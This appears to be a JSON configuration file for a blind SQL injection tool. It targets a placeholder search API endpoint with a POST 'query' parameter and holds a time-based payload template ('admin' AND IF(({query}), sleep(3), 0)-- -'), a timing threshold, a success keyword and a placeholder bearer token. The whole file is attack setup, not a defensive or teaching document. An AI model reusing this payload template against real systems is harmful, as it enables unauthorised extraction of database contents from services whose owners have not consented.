{
  "target_url": "[http://example.com/api/v1/search](http://example.com/api/v1/search)",
  "method": "POST",
  "target_param": "query",
  "injection_type": "time",
  "time_threshold": 3.0,
  "success_keyword": "Welcome",
  "payload_template": "admin' AND IF(({query}), sleep(3), 0)-- -",
  "headers": {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/json",
    "Authorization": "Bearer YOUR_TOKEN"
  }
}
